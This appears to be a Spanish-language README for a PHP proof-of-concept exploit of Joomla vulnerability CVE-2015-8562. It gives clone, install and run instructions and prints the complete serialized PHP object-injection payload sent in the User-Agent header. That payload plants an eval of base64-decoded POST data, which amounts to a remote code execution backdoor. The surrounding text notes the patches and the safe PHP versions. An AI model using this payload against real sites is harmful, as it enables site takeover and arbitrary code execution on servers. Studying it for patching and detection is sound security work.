
Una prueba de concepto para la vulnerabilidad CVE-2015-8562 de Joomla
Una prueba de concepto para la vulnerabilidad CVE-2015-8562 de Joomla
Esta PoC es una copia casi 1:1 de la implementación en Python de Gary alojada en exploit-db.
Es muy fácil de instalar:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Una vez que composer tenga todo instalado, deberás cambiar $target en exploit.php.
Después de eso, estás listo para continuar:
php exploit.php
En diciembre de 2015 se encontró una vulnerabilidad en Joomla. Permite a atacantes remotos realizar ataques de inyección de objetos PHP y ejecutar código PHP arbitrario a través del encabezado HTTP User-Agent.
Esta vulnerabilidad afectó todas las versiones de Joomla. Ya se ha publicado un parche para las versiones v1.5.x, v2.5x y v3.x.
Si estás ejecutando PHP >= 5.4.45, >= 5.5.29 o >= 5.6.13 estás a salvo, ya que este exploit también utiliza CVE-2015-6835.
Nikos Verschore de PatrolServer realizó una entrada de blog muy detallada y fue de gran ayuda para entender esta vulnerabilidad. Puedes usar su mini-escáner de forma gratuita para verificar si tu sitio está en riesgo.
Así es como se ve el encabezado User-Agent enviado:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}